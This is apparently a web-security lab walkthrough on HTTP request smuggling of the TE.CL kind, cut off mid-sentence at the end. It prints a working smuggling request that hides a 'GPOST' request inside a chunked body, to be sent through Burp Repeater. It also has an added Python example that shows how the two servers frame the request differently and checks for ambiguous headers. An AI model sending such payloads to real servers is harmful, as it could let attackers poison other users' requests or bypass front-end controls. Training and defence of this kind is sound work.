HTTP request smuggling, basic TE.CL vulnerability
This lab involves a front-end and back-end server, and the two servers handle duplicate HTTP request headers in different ways. The front-end server rejects requests that aren’t using the GET or POST method.
Reproduction and proof of concept
In Burp Suite, disable the automatic Content-Length update option in Repeater (in the topmost menu row), so that the Content-Length header is sent exactly as typed.
Using Burp Repeater, issue the following request twice:
POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

The second (or third) response should say:
Unrecognized method GPOST.
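Why the two servers disagree on where this request ends, as an added example that is not part of the original write-up: it frames the request above once by Transfer-Encoding (front-end) and once by Content-Length (back-end), returns the bytes left on the back-end connection, and includes the header check a front-end can use to refuse such requests. The function names are hypothetical, and the CRLF line endings and the blank line after the final 0 chunk are assumed, as chunked encoding requires.

```python
# Added example; request bytes are reconstructed from the request shown above.
CRLF = b"\r\n"
SMUGGLED = (
    b"GPOST / HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 15\r\n"
    b"\r\n"
    b"x=1"
)
BODY = b"5c\r\n" + SMUGGLED + b"\r\n0\r\n\r\n"
RAW = (
    b"POST / HTTP/1.1\r\n"
    b"Host: lab-id.web-security-academy.net\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-length: 4\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
) + BODY

def split_message(raw):
    # Return (headers keyed by lowercase name, body bytes).
    head, _, body = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def consumed_by_chunked(body):
    # Body length as seen by a Transfer-Encoding parser (the front-end).
    pos = 0
    while True:
        eol = body.index(CRLF, pos)
        size = int(body[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            return body.index(CRLF, pos) + 2  # final CRLF; no trailers assumed
        pos += size + 2  # chunk data plus its CRLF

def leftover_for_backend(raw):
    # Bytes a Content-Length parser (the back-end) leaves on the connection.
    headers, body = split_message(raw)
    return body[int(headers[b"content-length"]):consumed_by_chunked(body)]

def is_ambiguous(raw):
    # Both framing headers present: reject or normalise at the front-end.
    headers, _ = split_message(raw)
    return b"content-length" in headers and b"transfer-encoding" in headers
```

The leftover declares Content-Length: 15 but only 10 body bytes follow its headers, so the back-end waits for bytes from the next request on the connection before answering, which is why the error shows up on a later response.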
An attacker will need to smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method